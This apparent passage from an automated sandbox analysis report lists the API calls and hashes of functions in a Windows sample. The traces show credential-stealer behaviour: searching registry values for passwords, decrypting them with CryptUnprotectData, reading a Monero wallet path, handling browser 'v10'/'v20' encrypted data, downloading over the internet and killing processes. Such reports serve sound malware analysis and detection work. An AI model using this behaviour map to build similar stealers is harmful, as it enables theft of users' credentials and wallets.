                          • lstrcat.KERNEL32(?,?), ref: 0041E098
                          • lstrcat.KERNEL32(?,?), ref: 0041E0AC
                          • lstrcat.KERNEL32(?,00FAB338), ref: 0041E0C0
                          • lstrcat.KERNEL32(?,?), ref: 0041E0D4
                          • lstrcat.KERNEL32(?,00FBD588), ref: 0041E0E7
                          • lstrcpy.KERNEL32(00000000,?), ref: 0041E11F
                          • GetFileAttributesA.KERNEL32(00000000), ref: 0041E126
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$lstrcpy$AttributesFile
                          • String ID:
                          • API String ID: 3428472996-0
                          • Opcode ID: 48df637f5adf256f89f33124bfa96c9134e1575a9771df776a95f89c303645bd
                          • Instruction ID: 501516eef5e6119cdaa8ef057f8ceb6b02008702d368781ef888722ec6d27aa0
                          • Opcode Fuzzy Hash: 48df637f5adf256f89f33124bfa96c9134e1575a9771df776a95f89c303645bd
                          • Instruction Fuzzy Hash: CD41D771E1011C9BCB25DB64DD486DE73B5BF48300F0049AAF90AA3291DFB89F858F94
                          Function 00407A60 Relevance: 13.6, APIs: 8, Strings: 1, Instructions: 109stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 004077D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00407805
                            • Part of subcall function 004077D0: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 0040784A
                            • Part of subcall function 004077D0: StrStrA.SHLWAPI(?,Password), ref: 004078B8
                            • Part of subcall function 004077D0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 004078EC
                            • Part of subcall function 004077D0: HeapFree.KERNEL32(00000000), ref: 004078F3
                          • lstrcat.KERNEL32(00000000,00434AD4), ref: 00407A90
                          • lstrcat.KERNEL32(00000000,?), ref: 00407ABD
                          • lstrcat.KERNEL32(00000000, : ), ref: 00407ACF
                          • lstrcat.KERNEL32(00000000,?), ref: 00407AF0
                          • wsprintfA.USER32 ref: 00407B10
                          • lstrcpy.KERNEL32(00000000,?), ref: 00407B39
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00407B47
                          • lstrcat.KERNEL32(00000000,00434AD4), ref: 00407B60
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$Heap$EnumFreeOpenProcessValuelstrcpywsprintf
                          • String ID: :
                          • API String ID: 398153587-3653984579
                          • Opcode ID: 0e9693a24bed11132ccf272c91ee3e2d1e75641051f5d3aaf3441a98692b6c9b
                          • Instruction ID: 4a0270a12d15eba44ba155fce02676c7c42fa7ad0357aa4cf213092b6f362f58
                          • Opcode Fuzzy Hash: 0e9693a24bed11132ccf272c91ee3e2d1e75641051f5d3aaf3441a98692b6c9b
                          • Instruction Fuzzy Hash: CA319572E04214AFCB14DB64DC449ABB77AEB88704F14552EF605A3390DB78F941CBA5
                          Function 004181B0 Relevance: 12.7, APIs: 10, Instructions: 175stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlen.KERNEL32(00000000), ref: 0041820C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00418243
                          • lstrlen.KERNEL32(00000000), ref: 00418260
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00418297
                          • lstrlen.KERNEL32(00000000), ref: 004182B4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 004182EB
                          • lstrlen.KERNEL32(00000000), ref: 00418308
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00418337
                          • lstrlen.KERNEL32(00000000), ref: 00418351
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00418380
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen
                          • String ID:
                          • API String ID: 2001356338-0
                          • Opcode ID: 9a0a668d4ffc206761009af268696d54ba45bb04eb8617637b620cd5376e1d80
                          • Instruction ID: 5529c5f78c625342dc980c30c67e31fec9b4df9f7308107f545db0c079820e43
                          • Opcode Fuzzy Hash: 9a0a668d4ffc206761009af268696d54ba45bb04eb8617637b620cd5376e1d80
                          • Instruction Fuzzy Hash: 7151AF71A006069FDB10DF39D958AABB7A4EF00740F14452AAD16EB384DF78ED90CBE4
                          Function 004077D0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 208registrymemoryCOMMON
                          Download Yara Rule
                          APIs
                          • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00407805
                          • RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 0040784A
                          • StrStrA.SHLWAPI(?,Password), ref: 004078B8
                            • Part of subcall function 00407750: GetProcessHeap.KERNEL32(00000008,00000400), ref: 0040775E
                            • Part of subcall function 00407750: RtlAllocateHeap.NTDLL(00000000), ref: 00407765
                            • Part of subcall function 00407750: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0040778D
                            • Part of subcall function 00407750: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 004077AD
                            • Part of subcall function 00407750: LocalFree.KERNEL32(?), ref: 004077B7
                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004078EC
                          • HeapFree.KERNEL32(00000000), ref: 004078F3
                          • RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 00407A35
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$EnumFreeProcessValue$AllocateByteCharCryptDataLocalMultiOpenUnprotectWide
                          • String ID: Password
                          • API String ID: 356768136-3434357891
                          • Opcode ID: 3cf325d79a33fb09ef097e4edaf5e7818a90b8d9ff6e4902b4fbaaa44bd21b81
                          • Instruction ID: 851ed36c2908793e5c394c9a592e4404168f92a7ab381124a98ace949238a758
                          • Opcode Fuzzy Hash: 3cf325d79a33fb09ef097e4edaf5e7818a90b8d9ff6e4902b4fbaaa44bd21b81
                          • Instruction Fuzzy Hash: 89712EB1D0021DEBDB10DF95DC80ADEB7B9EF49300F10456AE609B7240EB756A89CFA5
                          Function 00401120 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 37registrymemoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00401135
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0040113C
                          • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00401159
                          • RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401173
                          • RegCloseKey.ADVAPI32(?), ref: 0040117D
                          Strings
                          • SOFTWARE\monero-project\monero-core, xrefs: 0040114F
                          • wallet_path, xrefs: 0040116D
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                          • API String ID: 3225020163-4244082812
                          • Opcode ID: 6d01a78dd2703cc8c80cfc44e62c956613e7042535cbaa24fe8283e197e708bc
                          • Instruction ID: 383e7467a56373d6d0d7d4512f8a3326ad796bb69a11dfcae5090baa37e7c7c5
                          • Opcode Fuzzy Hash: 6d01a78dd2703cc8c80cfc44e62c956613e7042535cbaa24fe8283e197e708bc
                          • Instruction Fuzzy Hash: 23F06D75A40308BFD7049BA09C8DFEA7B7DEB04755F100059BE05E2290EAB05A448BE0
                          Function 00409DE0 Relevance: 12.2, APIs: 5, Strings: 3, Instructions: 183memorystringCOMMON
                          Download Yara Rule
                          APIs
                          • memcmp.MSVCRT(?,v20,00000003), ref: 00409E04
                          • memcmp.MSVCRT(?,v10,00000003), ref: 00409E42
                          • LocalAlloc.KERNEL32(00000040), ref: 00409EA7
                            • Part of subcall function 004271E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 004271FE
                          • lstrcpy.KERNEL32(00000000,00434C48), ref: 00409FB2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpymemcmp$AllocLocal
                          • String ID: @$v10$v20
                          • API String ID: 102826412-278772428
                          • Opcode ID: b792278274e77446f0b5aa8e1a9ca83b91a2c69d73382fa436c475225909a066
                          • Instruction ID: e7189ebb8ea779bb62c76878cc913784305d8d18a868e4b117b5cd877531c5f0
                          • Opcode Fuzzy Hash: b792278274e77446f0b5aa8e1a9ca83b91a2c69d73382fa436c475225909a066
                          • Instruction Fuzzy Hash: 5451BF31B102099BDB10EF69DC45B9E77A4AF40318F15503AF909FB2D2DBB8ED058B98
                          Function 00405640 Relevance: 12.1, APIs: 8, Instructions: 112networkmemoryfileCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040565A
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00405661
                          • InternetOpenA.WININET(0042CFEC,00000000,00000000,00000000,00000000), ref: 00405677
                          • InternetOpenUrlA.WININET(00000000,00000001,00000000,00000000,04000100,00000000), ref: 00405692
                          • InternetReadFile.WININET(?,?,00000400,00000001), ref: 004056BC
                          • memcpy.MSVCRT(00000000,?,00000001), ref: 004056E1
                          • InternetCloseHandle.WININET(?), ref: 004056FA
                          • InternetCloseHandle.WININET(00000000), ref: 00405701
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                          • String ID:
                          • API String ID: 1008454911-0
                          • Opcode ID: 56991fbfa8ff731cefd4789a31361217da942f2a87cf7d2a2611e9ffcee565a7
                          • Instruction ID: 497886bade507dc047050612015881185fcc427d3ee3b68b24892f00a211d5cf
                          • Opcode Fuzzy Hash: 56991fbfa8ff731cefd4789a31361217da942f2a87cf7d2a2611e9ffcee565a7
                          • Instruction Fuzzy Hash: 2E415C70A00605AFDB14CF54DD88F9BB7B5FF48304F14806AE909AB391D7759941CFA8
                          Function 00424740 Relevance: 12.1, APIs: 8, Instructions: 52processCOMMON
                          Download Yara Rule
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00424759
                          • Process32First.KERNEL32(00000000,00000128), ref: 00424769
                          • Process32Next.KERNEL32(00000000,00000128), ref: 0042477B
                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0042479C
                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 004247AB
                          • CloseHandle.KERNEL32(00000000), ref: 004247B2
                          • Process32Next.KERNEL32(00000000,00000128), ref: 004247C0
                          • CloseHandle.KERNEL32(00000000), ref: 004247CB
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                          • String ID:
                          • API String ID: 3836391474-0
                          • Opcode ID: 52672e04caeec890ace4a1d791050bff1080cdcf40c9c1db2d30368871fa3206
                          • Instruction ID: 2796138e49d57b0afb57703697c4648b669f32e79a409fcda75587c3eb52ce3c
                          • Opcode Fuzzy Hash: 52672e04caeec890ace4a1d791050bff1080cdcf40c9c1db2d30368871fa3206
                          • Instruction Fuzzy Hash: 3E019271601224AFE7215B70ACC9FEB77BDEB88791F401189F90592290EFB48D808AA4
                          Function 004183E0 Relevance: 10.6, APIs: 7, Instructions: 147stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlen.KERNEL32(00000000), ref: 00418435
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0041846C
                          • lstrlen.KERNEL32(00000000), ref: 004184B2
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 004184E9
                          • lstrlen.KERNEL32(00000000), ref: 004184FF
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0041852E
                          • StrCmpCA.SHLWAPI(00000000,00434C3C), ref: 0041853E
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen
                          • String ID:
                          • API String ID: 2001356338-0
                          • Opcode ID: 8150c0be56da93f1ae30d5dcf51d92bd68bbe0f7923c85136ff01eeaecae8e4e
                          • Instruction ID: 78e6861f8760121f1f85c03bd3cb1e2b351bada1f484352ddec1a083a3ca406f
                          • Opcode Fuzzy Hash: 8150c0be56da93f1ae30d5dcf51d92bd68bbe0f7923c85136ff01eeaecae8e4e
                          • Instruction Fuzzy Hash: 2D5180716002069FCB24DF69D984A9BB7F6EF44344F24845EEC45EB345EF38E9818B94
